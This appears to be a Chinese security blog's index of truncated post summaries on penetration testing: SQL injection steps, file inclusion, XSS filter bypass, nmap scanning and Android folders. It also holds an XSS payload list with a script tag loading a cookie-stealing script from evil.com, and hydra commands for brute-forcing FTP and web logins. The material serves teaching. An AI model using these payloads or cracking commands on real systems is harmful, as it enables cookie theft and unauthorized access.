摘要:
(一)针对网站程序,不考虑服务器。 一、查找注入,注意数据库用户权限和站库是否同服。 二、查找XSS,最近盲打很流行,不管怎样我们的目的是进入后台。 三、查找上传,一些能上传的页面,比如申请友链、会员头像、和一些敏感页面等等,注意查看验证方式是否能绕过,注意结合服务器的解析特性,比如典型的IIS6. 阅读全文
摘要:
一,常规注入步骤: 1,正常输入 2,判断是否存在SQL注入 一般输入单引号判断“ ‘ ”,若服务器未做过滤则说明存在注入。 3,判断是数字型注入还是字符型注入 输入“2-1”,若是数字型则返回ID=1的情况。 输入“1’ or '1' = '1”,若返回ID=1的情况说明是字符型注入。 4,猜解查 阅读全文
摘要:
一,LFI(Local File Include) 意思是能够打开并包含本地文件的漏洞。 相关函数:include(), require(), include_once(), require_once(), file_get_contents() 除此之外,通过实践我发现这个函数如果直接把字符串当作 阅读全文
摘要:
一,Bluetooth Low Energy协议基本组成 蓝牙系统核心架构可分为三个方面: BLE Application和BLE Host 属于应用层API HCI(Host Controller Interface)为中间层 BLE Controller为底层蓝牙芯片 其中在HOST层有的两个比 阅读全文
摘要:
批量扫描IP端口,并将结果导出为由IP命名的文件。 假设IPlist.txt文件内容为:127.0.0.1192.168.1.1 然后我们获取文件内容IP进行扫描(nmap的”-p-“选项指定nmap扫描从1-65535的所有端口;默认情况下nmap只扫描常见的1000个端口;如果你想要更快的话,可 阅读全文
摘要:
一、文件夹 1./acct/ 系统回收站,删除的系统文件。 2./cache/ 缓存 3./data/ 用户的所有程序相关数据 app/ 所有用户安装的apk文件 app-private/ data/ 每一个应用的数据 com.xx.appname/ 每一个应用的数据都存放在本目录下的一个以包名为命 阅读全文
摘要:
很多网站为了避免XSS的攻击,对用户的输入都采取了过滤,最常见的就是对<>转换成<以及>,经过转换以后<>虽然可在正确显示在页面上,但是已经不能构成代码语句了。这个貌似很彻底,因为一旦<>被转换掉,什么<script src=1.js></script>就会转换成“<script 阅读全文
摘要:
1.<script> alert(1);</script> 2.<script>alert('xss');</script> 3.<script src="http://www.evil.com/cookie.php"></script> 4.<script>location.href="http: 阅读全文
摘要:
正则表达式 css选择器 xpath xpath是XML路径语言,拥有在数据结构树中查找节点的能力。被开发者当作小型查询语言使用,它通过元素和属性进行导航。 requests http://f61be319.wiz03.com/share/s/3S6-cp1BIQ952yXKyj02PIM43sCB 阅读全文
摘要:
破解ftp:# hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV# hydra ip ftp -l 用户名 -P 密码字典 -e ns -vVget方式提交,破解web登录:# hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ht 阅读全文